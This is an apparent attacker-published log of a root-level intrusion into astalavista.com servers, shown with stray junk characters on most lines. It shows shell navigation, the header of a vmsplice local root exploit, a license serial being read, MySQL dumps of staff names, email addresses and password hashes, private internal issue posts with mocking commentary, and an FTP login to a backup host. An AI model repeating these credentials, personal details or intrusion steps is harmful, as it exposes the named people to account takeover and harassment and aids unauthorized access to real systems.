/ T: ]% A* |8 {# Q+ p& Rsh-3.2# cd ..1 z! j2 D4 W, p! l# v
sh-3.2# cd com9 D; h& U3 B; _6 J( n, T- Y
sh-3.2# ls -la
" J1 t0 n, ~+ g# |7 s0 l/ F- Ltotal 141208) C; _* a3 W; q, y6 t% E
drwx–x–x 10 com com 4096 Apr 28 12:40 ./ A5 \# y) i2 n8 y% f
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 Q8 j! J3 \2 F$ u( T
drwx—— 2 com com 4096 Jun 4 04:04 backups) D( d1 O& \) v1 u8 e6 o2 R
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql( [/ W8 d0 s* z0 Y8 U$ J0 J% |
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
* Q5 v3 ?. Q$ j' K: `-rw——- 1 com com 21880 Jun 2 08:07 .bash_history6 ]8 c7 @- j: @" j3 Q
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
; B$ {2 d$ a A$ p' ?% I-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile- f3 U, [9 m9 b
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
% o" g' r0 C& ^, P; qdrwx–x–x 3 com com 4096 Jan 29 2008 domains
# L2 k% ]1 P4 _0 I9 y-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed+ C0 O: N" f. r
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
g' S( x, }4 t+ O% |/ n/ P) {8 `-rw——- 1 com com 69 Nov 18 2008 .lesshst
' L" j1 \* m1 }6 x# p' @. mdrwx—— 2 com com 4096 Sep 24 2007 mail' P2 N2 B2 ^) V7 W* W
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history O) M+ a" Z+ n8 i# W6 z
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp* m4 ]' N5 X# Y; T# {* ?1 Z' ^
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
. U# p* U6 | D* Y9 [2 k% F-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
) D$ H* n# J+ L" odrwx—— 2 com com 4096 Aug 26 2008 .ssh
6 A3 t7 B! J. ?8 c/ b! p6 N-rwx—— 1 com com 8515 Feb 10 2008 t& x+ u4 V4 w7 b7 Y/ D0 b: U2 j
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
& y' ?' \$ w9 P) O0 adrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp* r0 H4 W4 X: @
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
+ R9 l( K/ y( [* }/ q( t2 G" A-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
2 p# a3 _- Q$ c: Z' L0 I& [. _8 k4 o-rw——- 1 com com 16629 Mar 28 21:46 .viminfo% j& y. u& h' V. V2 H! p/ J
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc: ^6 _0 g7 b; ^3 J* G
; h! E& x3 D$ j) K9 A
sh-3.2# head t.c
' U+ C6 t+ c8 I3 P! q! v% ]/*
: U5 P9 H4 i9 I* jessica_biel_naked_in_my_bed.c
- a+ u4 B0 R v*) L( I7 o6 l3 T6 X
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.6 U2 |6 A# w7 |- j: y
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
6 V* z. m0 y: s7 M* R# e0 W* Stejnak je to stare jak cyp a aj jakesyk rozbite.
' g0 b8 [; r' ^1 h0 w# S*; e5 q1 I4 [+ E, F: R8 q x) c
* Linux vmsplice Local Root Exploit
+ J9 i2 d* i9 L- b* By qaaz0 }3 ?8 @$ p& n+ B+ p% J4 |6 b
*4 G, u4 n" g6 m" W$ r
7 {- @* Q+ n1 b! e6 u! @1 hsh-3.2# cd /) |1 [. R# c/ c$ ~' u8 j- Q/ @
sh-3.2# ls -la0 ~% l+ I6 N+ Z# {& {( w
total 360
8 t1 T8 l V$ y; ?drwxr-xr-x 25 root root 4096 Jun 3 02:43 .+ Y8 h. M# Q+ r4 `8 h
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
0 q3 g4 }+ _& L/ Q7 }-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
# Y1 x: P! s6 H+ a9 \-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
3 ?6 m8 {/ m) E# H, v-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db ^4 x" }, {1 I1 M( m2 ?8 U
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck; a- i; O3 V4 k' Q% K; d- Q5 n2 A' O
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel$ ^, a$ j8 w0 L) _5 P
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup& Y) y5 r6 C% M* }/ m9 j( T8 L
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin+ k- I9 i4 b; i5 V1 E9 N
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot5 `; E1 U2 [# F! X6 C
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
- |9 a, s/ q- B3 F: p7 gdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc0 B9 r" G2 ]- `8 [
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home0 n+ {* z& i6 x
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf( g: ~& n9 z% d" j
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib5 A0 z, P# T9 U8 ?
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
^3 S* D8 n, `/ Qdrwx—— 2 root root 16384 Sep 11 2007 lost+found3 t! y8 k4 v) ^
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media0 g9 M( p% r# L' M
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
6 C: o! Z$ x- P7 D# x6 Ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt' e- y2 P; T. I) H
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
4 R. X& n* {) u: `2 b7 I; I: S. Gdrwxr-xr-x 2 root root 0 Jun 3 02:43 net& O* n: D- z4 P) V
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt; k2 D, }' b+ s/ S8 Y$ S: e4 \0 ^* [
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
" @% U0 k) ~ t& g- Y/ ?drwxr-x— 15 root root 4096 Jun 4 08:40 root
, I, A. R1 _, g7 V0 C3 ~/ Mdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin k1 U. o& d% v
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
6 b& T9 x6 d! m; A+ Pdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv0 K6 C# {" d( M& o
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
4 v8 M6 t3 ]$ t% O. u2 A% cdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
* }, Y% `5 E5 R; ^6 xdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr% ], ]- H4 r, p9 Y% t/ w
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
3 x# R* k+ g$ p6 b. |* _/ e. [6 j# ?$ \2 T: G" [5 k/ G0 k/ H1 n
sh-3.2# cd opt- q- E( r# i4 t9 ?6 H0 @4 |2 }& y
sh-3.2# ls -la
. g* i4 l( h8 d& Atotal 20
2 g: T' @6 `$ X: q, q' Adrwxr-xr-x 3 root root 4096 Mar 11 17:56 . L$ d: j. Z) F- ?8 Y& s/ b& w: {
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
9 e1 b1 h* f( x! Y9 P* E$ y& T ldrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws& B# f; I" m) P8 b( L
. R, u8 D! Z; e! x3 w( K3 H
sh-3.2# cd lsws/8 b( k/ q* Q" Y
sh-3.2# ls -la
. f; x$ J3 R( ~3 z. Q0 M( p8 Ntotal 108
r; W& ^; Z) Y* udrwxr-xr-x 15 root root 4096 Mar 20 2008 .
0 o) _, C. @ V- _/ A" U2 G$ Y5 hdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..9 K% g" |! g" m- Z6 B) p9 U @
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons( o( L- }8 m* U" Q
drwxr-xr-x 13 root root 4096 May 29 15:10 admin) w- }7 R' k3 [5 G. ~, t# m
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate0 \6 w/ C! W$ R/ H- ~
drwxr-xr-x 2 root root 4096 May 29 15:10 bin2 W8 u2 |1 p3 M- G* f4 J
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
2 \2 Z& N! {# {+ Xdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT4 u! b: @4 w% a/ z
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs" q1 J5 M! |% s* i' V: n) K
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
~2 L, i9 b: Y& l* F7 m( s+ ~drwxr-xr-x 2 root root 4096 Sep 15 2008 lib- e/ q7 W7 Q2 o8 }: ], ~
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
) d0 N! P) j! S8 p7 y-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
9 K5 x" S x& I$ F-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
3 o$ i4 e( ]" Q ?% G-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP3 C. [% r- c: G" T4 t8 e
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs, S* S8 w5 A- x* b, V0 J( L
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
: y6 `- e. o$ Fdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
+ q/ n, V/ {7 `; l1 k* ?drwxr-xr-x 3 root root 4096 Mar 20 2008 share' B6 a" k2 Y0 Z
-rw-r–r– 1 root root 6 May 29 15:10 VERSION/ W1 f& q, E; d8 |
1 g8 r. W2 j' n# ?) T
sh-3.2# cd conf0 A) m1 n: p& b) b
sh-3.2# ls -la" L5 Y7 Q0 P) u" l- H+ W
total 48* ~" J" H# o- z& ^( m6 F
drwx—— 4 apache apache 4096 Jun 3 02:43 .
& I0 y0 L/ Y6 l" W2 pdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..2 I+ U1 ~9 t/ N. j1 e; O
drwx—— 2 apache apache 4096 Mar 20 2008 cert1 i, z6 J; e8 P1 l! _! k
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
/ j! @ F. G* K7 b/ o; f% m" _. r-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak8 z5 P& Q3 M0 I5 L' c
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
$ r) C2 h5 j' L6 y, b1 e7 o-rw——- 1 apache apache 256 May 29 15:10 license.key% D- D i7 v. \
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old+ E5 h/ N- z+ L% M# a+ y' ` Y
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties; b& t- h: {+ u. B6 h i) a! V
-rw——- 1 apache apache 20 May 29 15:10 serial.no
* m& i0 @. J# g4 {+ o2 [4 D0 w$ p/ Rdrwx—— 2 apache apache 4096 Mar 20 2008 templates8 j: z g5 [! c3 |6 B7 J
+ k8 s S' f9 ?* J+ Lsh-3.2# cat serial.no2 c6 M* k# x. D$ n1 x
IbDl-oVsO-CKqL-wVRa7 k H& K0 a3 s0 O6 \! I2 V
J& q; L$ ~5 Q5 s8 y
sh-3.2# mysql
* I d% N0 o' P0 ^9 R) [& `% K# e' VWelcome to the MySQL monitor. Commands end with ; or \g.
4 T R1 m% n5 {/ }& ]: D. A' a- X7 LYour MySQL connection id is 286844
2 \7 Z! v) O2 q( x+ M4 u. Z( f0 aServer version: 5.0.45-community-log MySQL Community Edition (GPL)3 w) y. }! y" i! H5 T# n' {# p# H
$ j' ~0 h& p) t
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
* d; J2 O8 F5 d/ j. n0 H( K$ a7 P5 {0 f
mysql> show databases;/ z D. i1 V4 {4 F
+———————–+
}2 K+ P3 g- N& f| Database |
1 R9 E8 t) g D) Q+———————–+# r3 I& B1 D$ w! ?, C
| information_schema |
, H8 V9 y/ Q; c, i8 ^5 U0 a+ k| astanet_ads | n" ^4 K1 n3 X* K; V. s: e
| astanet_mailing_lists |
4 D% ^4 v* }1 n3 X| astanet_mediawiki |7 y# ~0 O) G2 [, F* _. [
| astanet_membersystem |& k% D& o, |6 k( Q2 \
| com_contrexx |4 V. o% B% u- T: f/ |, j* S; {
| com_contrexx2 |! N& r8 L- O \& W9 x- _
| com_contrexx2_live |
" u" h, \7 E5 M# A' n$ [4 E4 J| da_roundcube |
( X4 n/ u/ p9 D" `| dolphin |# @ m7 \* G1 \% `
| ideapool |
/ x& l; L9 L$ _8 q! z| mysql |" N* e. t: B0 [
| test |
^8 o ?5 w1 Z& ^* m5 R| yourmaster |8 c# l: L' O1 h" T
+———————–+! {% ]& }. b$ i5 V! L8 x
14 rows in set (0.00 sec)2 E( X- E) J; Y4 Z: Q
- l+ O' p' `5 D. K- o! L" \mysql> use ideapool* j$ C) f! P; M& I( z; l+ C
Database changed
& o5 K0 p9 \+ q; Pmysql> show tables;
% B4 Y$ R$ O8 U+———————————–+( w# T) \7 N4 F9 \
| Tables_in_ideapool |& S4 R* m+ h4 t5 x
+———————————–+
9 _& o0 n: N( W| eventum_columns_to_display | Y, S+ S k2 J; `- n
| eventum_custom_field |
+ h7 z, \" T- @9 @- c3 C( n$ t| eventum_custom_field_option |
! {* p" e) o+ a) c/ n5 U| eventum_custom_filter |- C' A: @$ ?$ [3 O7 A
| eventum_customer_account_manager |
n4 H( J7 Z9 G5 n| eventum_customer_note |
' h1 @* ]! `. K# J$ p| eventum_email_account |
c+ C/ F Y1 Z2 g| eventum_email_draft |
: g% S4 A) s& u, I! g7 O! l1 f| eventum_email_draft_recipient |
! v$ G+ V$ \; [$ m1 }" Q2 s+ ]. || eventum_email_response |
; {6 ~8 m, E8 D! m| eventum_faq |8 [0 O! v' I, o
| eventum_faq_support_level |* M$ o H2 y3 P) v- V) @( {5 \1 ?
| eventum_group |9 q" l5 i. L- L x# e7 |2 r- Q$ E- J: [* Q
| eventum_history_type |
4 ~$ y$ o1 e- O. G| eventum_irc_notice |
, v2 w% Q8 Y' f5 e( a| eventum_issue |; O% [- o, n, x4 N1 [
| eventum_issue_association |; x$ X6 c. F$ U7 o( H5 }8 a
| eventum_issue_attachment |
' G8 ~2 S) T, z) Q| eventum_issue_attachment_file |) H& H' L7 g M6 n1 r
| eventum_issue_checkin |
; X. q0 d5 F) ~! D, l$ b| eventum_issue_custom_field |- q7 z8 u! `( _/ E" Q, W+ b; X
| eventum_issue_history |
' l' O7 `& _+ y5 _/ f" g| eventum_issue_quarantine |
& d0 |2 o9 u V7 f| eventum_issue_requirement |9 `1 g& a' J$ V/ q; B; ?, q4 b9 Y! [
| eventum_issue_user |% h5 r/ i& s: t, i3 q6 i
| eventum_issue_user_replier |0 L: V& v9 F) v- E' D+ G
| eventum_link_filter |; v& {- W0 V ?* {7 Y2 f
| eventum_mail_queue |
" _9 q% o$ B1 C5 D d| eventum_mail_queue_log |
7 _, a/ X8 E9 Y8 b| eventum_news |
+ a) F8 X; [3 e9 R1 f: h| eventum_note |% a4 P* S+ p3 V
| eventum_phone_support |- {3 f5 v% t7 M& L5 y1 o
| eventum_project |
4 {( r, v$ o! H' |' q! m| eventum_project_category |
/ j6 v6 }$ y. V2 v# Y. [4 w| eventum_project_custom_field |3 o+ H; }7 Q' h8 M; `: N
| eventum_project_email_response |) i0 N3 |1 x7 R
| eventum_project_field_display |) M( w+ v- V- b" _! v
| eventum_project_group |# U/ ?3 q. r7 ?: m, F. \4 ^
| eventum_project_link_filter |" p$ r* b L* ^' \* [* j1 n' K2 C
| eventum_project_news |
, a; s8 x% M6 s5 e1 M! t7 J| eventum_project_phone_category |
: b' s& u1 J) M| eventum_project_priority |
* }- F9 Q: x. Q/ I) t| eventum_project_release |$ `- a8 t8 n2 w0 K8 z+ G [ V
| eventum_project_round_robin |2 x! K5 M4 e7 t
| eventum_project_status |5 D6 d5 ~) o' C! ]% j) x
| eventum_project_status_date | O( }( j/ b, \) i, s6 N2 ~( Z
| eventum_project_user |9 @3 o7 z8 }- G) H. P6 n
| eventum_reminder_action |3 v8 t# b; B" j, T; G- l
| eventum_reminder_action_list |' [; }; ^3 c' F# u
| eventum_reminder_action_type |9 c9 Y5 b# X7 y; E
| eventum_reminder_field |2 h% z! X4 G: {
| eventum_reminder_history |/ q9 |. g; V& r3 ]
| eventum_reminder_level |
* q2 C2 `. i6 g. A| eventum_reminder_level_condition | H7 v1 B) T3 i4 G6 z
| eventum_reminder_operator |# `1 j# t% t8 |9 o4 ^; s1 \1 A6 Q8 ~+ w
| eventum_reminder_priority |, w+ H/ @- [. d9 _8 E
| eventum_reminder_requirement |0 s5 ]3 q3 Z# X) u% F& Y" j7 f* S- |
| eventum_reminder_triggered_action |
* B5 o* G( w$ T3 h' m/ x| eventum_resolution |
- }. n( T5 O7 |( M; k+ d| eventum_round_robin_user |
2 o6 U' Z4 B+ b% T| eventum_search_profile |
; M5 O+ v! ?* E- L& M| eventum_status |
% R+ v, v. p8 V, C| eventum_subscription |9 p% ]& w3 Y0 k! t, _1 |
| eventum_subscription_type |
: ?3 d' t v3 {. j& D( a| eventum_support_email |
8 ?+ e2 v9 w$ v| eventum_support_email_body |
7 f- J T$ _/ B2 y- W: H1 w) `5 y| eventum_time_tracking |. K0 \+ r/ I; i, i: i6 ^3 q2 S' j1 J
| eventum_time_tracking_category |9 _! u' B @: \7 z
| eventum_user |% e; u1 ?, y" a) d {+ O3 V! y) y
+———————————–+! W% Q: w2 l1 I1 ^5 W
69 rows in set (0.00 sec)) e6 Y4 c- u5 K$ w, j
5 J: s( o- V3 Z) T6 J( ?mysql> describe eventum_user;
+ P! z* @7 d. I8 G7 S, \+————————-+——————+——+—–+———————+—————-+
) u& `6 o$ H6 W1 n! z| Field | Type | Null | Key | Default | Extra |+ ]" h& O$ L8 L- m) \" b( \ q
+————————-+——————+——+—–+———————+—————-+
$ g5 { M4 { B% m$ d| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |( p, j, _% ]; l0 [
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |/ f8 _3 b6 c8 ]& s6 e" M
| usr_customer_id | int(11) unsigned | YES | | NULL | |& A/ ]( V; X4 u% K; C( s: d
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |5 c$ B. c1 v) `4 N# B+ ?
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
& l/ m* z9 U* W$ p# j/ I| usr_status | varchar(8) | NO | | active | |
5 `* W- N' a& || usr_password | varchar(32) | NO | | | |- K D' t; ]& _" g
| usr_full_name | varchar(255) | NO | | | |
! c5 r U; ?/ D* Y+ b| usr_email | varchar(255) | NO | UNI | | |- p. ^5 H9 V, e) y0 J* O
| usr_preferences | longtext | YES | | NULL | |2 \: L& Y/ R- m1 [
| usr_sms_email | varchar(255) | YES | | NULL | |
8 P+ Q: b) a: Z; H0 @| usr_clocked_in | tinyint(1) | YES | | 0 | |6 N8 i: Q: i, W* l, @
| usr_lang | varchar(5) | YES | | NULL | |+ R: D5 { k8 ~: j1 Z9 y' X
+————————-+——————+——+—–+———————+—————-+* @5 l/ B% H$ ?+ R/ O1 e
13 rows in set (0.00 sec)) R- l5 g0 I4 a7 w4 m1 V4 @8 ~) x1 L
) l: q* @! X, f7 Q! _1 }3 r
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
$ P8 o' _* J6 ]+ }+———————-+——————————-+———————————-+
1 W9 z9 B1 m* k. B8 T| usr_full_name | usr_email | usr_password |. b7 [: ]( v+ i5 \8 f' ^" e
+———————-+——————————-+———————————-+' O* Y( O) J9 Z
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
- O$ c6 w9 r. H4 z! }" @| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
/ L; f7 o; f! b4 \) n! l0 v+ \| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
- K o3 {3 |% i: a1 N# o3 Y( g$ e3 N| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
t4 v: ], ]0 m! p2 ?| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |, h# h- w7 e0 B r. ^7 w2 f9 P* |
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |" ?4 m- F% `% D; B) B. ~' M& F/ \2 x2 `
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |8 }" a* ~8 c% t1 o& ~
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
. q s; J" n" n5 z1 b3 ^| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |# Z* m% {2 @- K2 d
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
7 d) i. b2 f( S, E1 A7 ^$ U| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |, S4 W" U" w* v' L2 g& v
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |" B+ n. }4 Z5 h% l
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |. }5 a6 G J" q) p8 _
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |. A: j3 Z) G2 u9 X' \
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |0 ?& v' |% g7 r, n& l' o6 N
+———————-+——————————-+———————————-+: `5 ]4 y' X& q: u: a( z) V/ T
15 rows in set (0.00 sec)
% g& N7 a) t. n+ W2 n; _9 t4 I5 Q) }/ Z8 y
mysql> select iss_description from eventum_issue where iss_id = 43;
9 G* [) f& M# D. N# Z+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+* z- R U! F- E/ T
| iss_description ) {# u9 a9 {2 ~$ J8 ]& `
|
1 C& ^& A0 p; h% J6 m* a+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
0 {8 b% u# a7 G9 `' p| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
l6 c: j) ~# a5 Q* ~, i: H0 xconnected for 90 mins… 120mins… so what i propose is something like:
2 w% R+ `. N G8 |" ?6 A) B链接标记[url]http://www.surfthechannel.com/[/url]0 V( S d) ^9 I* m
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system) H" }5 o+ ^+ }
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
+ U5 B2 T5 p, ~break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
( Y& k. R! ]) ^* w5 v- z; }if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…' Z6 j; K, X F- x% e
, Z7 O" }; H) O, q( P1 ^We could also put advertisement during play on the flash video player itself… extra $$…/ @; e/ k( M6 \/ y, Q; ?
. _1 q! _( B4 B( l+ S% ~' ]0 E% i$ S8 uBy sykadul |
! C& H9 n Q0 J( t) w+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+6 A2 Y3 g3 j: k: ~
1 row in set (0.00 sec)
) F$ m0 {: W' d J; `$ a, _
1 Z9 P; g! `1 S; N( C// Money and extra $$ is all they care about. remember that.
" S# q( v! @$ G5 F( c G+ R! o2 e! ~ c4 P
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
1 [7 d8 j7 k* Q) y+————————+——————————————————————————————————————————————————————————————————————————————-+
1 ~3 c9 `& L- r: V1 e1 i| iss_summary | iss_description * D9 U2 O, w v* L" W' h8 x
|! d+ x9 X* V* @% t
+————————+——————————————————————————————————————————————————————————————————————————————-+. X5 ], I( ^- d2 c2 x/ U
| Forum for REAL EXPERTS | Hello,
, o# ?- d9 W" e/ l( L! W1 B8 ?( W# U: \2 U
Ishtus and I,
6 n( y f% j* {% S4 q
* w" n0 q8 [. \$ n/ n( T, nCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
d+ n. U2 W6 p8 n4 GONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..) l+ j2 @, Y. I; }& D9 T: {
. X2 E5 B: s- R. [+ e% Z7 M
One example a friend of mine from coresecurity.com!
3 N7 \) Q) M& Y% s+ Y. W
/ Y" S; o, Q- ?0 [% EWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
$ L& ~& q/ Q! R
n+ b0 e, n$ b5 a( y+ O, W# G( u R|2 ~7 Y7 S8 ]" n) ^
+————————+——————————————————————————————————————————————————————————————————————————————+9 U' M6 m+ u4 P5 r v5 t ~
1 row in set (0.00 sec)
! Z5 c9 r6 c- b0 P3 k1 {; f
2 G; \. \' z! ]' Y- u// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
K/ q; d! l( G
# z" H8 m. M9 L V- _- Gmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
/ }- z9 v s, f8 _5 E+——————+———————————————————————————————+5 x! v; Y5 p3 l, L$ D5 c8 D' b" G. j' y
| iss_summary | iss_description | m8 q- W$ v, P/ z3 W( F
+——————+———————————————————————————————+8 a& @' j. q& c9 W! n
| Website guidance | Virtual Girl which guides you trought the website., H; C) |8 T. V q
0 K, i0 I, {6 F: ~' y) q* g$ }6 t8 XWe need a girl with who you can ( talk )!!!
! H$ \( T8 `0 i6 c: g, \, ~! p& CAlso for the News!
6 I* \3 |" `# [: `: {# s |6 ESo my suggestion is a girl who read you the news loud if you like!
7 b. `9 U3 @7 ], \3 Syou can choose between read yourselfe or she read it for you or both!8 Q! N/ R5 e2 a9 z
0 v' X9 Q) N+ O5 O- o
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!) M5 i7 J" ~9 y1 w
! o" y# q; q+ e+ D7 L, ?, _" m& `8 q \6 yHave a look on the example girls!!& F' f- L$ U+ [- T; f
! L# p6 i* s2 i3 |" N
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
( ^) O( U r- i6 G" C6 k- |: D6 s" T* n) i
or that
" U% u% x5 B, i1 _
; z9 f1 i$ Y6 l( T- {/ E链接标记[url]http://www.yellostrom.de/[/url]
/ i- o6 i& i% R7 O$ u& W, a; T7 w
2 n: M0 y w/ I|1 J5 X2 t2 ^# T" Z4 J+ x
+——————+———————————————————————————————+
- P7 {$ w$ g: e. | {7 `- r0 P1 row in set (0.00 sec)$ ]7 n% U. w; I+ d. b' ~, _
) v( N, L7 Q3 X, q1 p0 M// ha ha.! F2 u& w- V, v( h6 B9 B
2 ^- [, S$ n% f2 U1 T
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;$ a/ o5 J- K8 P x/ m; O$ W
+————————–+———————————————————————————————————–+9 E* G3 z$ i- D
| iss_summary | iss_description |
8 h. x' m: U/ V+ g6 t# I+————————–+———————————————————————————————————–+
0 y' `0 C) J2 y' U| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |4 b" Y3 W) g6 \* M3 S
+————————–+———————————————————————————————————–+
3 o( J* F. E9 L6 y1 row in set (0.00 sec)3 w/ {5 C8 k! q( `; t6 {" N4 p
6 E ?4 f: N; `2 \, L, j0 @
// LOL.
5 V/ a- P, A: b" d% i* e6 X. G8 r% U8 Q) Y
mysql> exit
3 E* h: I% _4 p, ]) Y( uBye
2 a1 |9 ~$ [, ~5 y0 N
$ m9 @; R8 D+ D- J- W/ O7 hsh-3.2# ftp 212.254.194.163/ E0 m9 T0 Q& h2 w$ P
Connected to 212.254.194.163.
3 n- ~$ D: m. b220 BackupCOM_VW FTP server ready.# c7 `2 K L2 z8 J; P7 V
504 AUTH: security mechanism ‘GSSAPI’ not supported.
! O" U5 X- x. W" u2 a504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
: p/ Q ]$ x' w, `- t& yKERBEROS_V4 rejected as an authentication type/ c; ^7 |8 Z' P0 b
Name (212.254.194.163:root): astalavista.com7 H7 E3 S2 G9 |0 |8 U/ l. t
331 Password required for astalavista.com.
; N5 B, I5 M: C% m. i/ ]# MPassword:
1 y9 k* z& h3 C, g230 User astalavista.com logged in.
7 N! W" B( ^" Z( R. f; @Remote system type is UNIX.
0 e3 v! [& i$ ]# |8 X0 WUsing binary mode to transfer files.( H$ ]4 _( ~& P4 Q4 }. ?
ftp> ls -la
0 q" J$ d5 I& {* F" I) v& f3 ^227 Entering Passive Mode (212,254,194,163,2,188)8 M! u9 \3 {6 b, I7 c
150 Opening BINARY mode data connection for ‘file list’.- Y: i! ~" |5 _0 i8 ~# }
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com% x$ y1 l$ |& e, z8 X$ {1 n
226 Transfer complete.& D3 H$ t! j! V
ftp> cd astalavista.com
6 P/ |7 n( D5 [250 CWD command successful.: ]* {0 C$ y9 W
ftp> ls -la
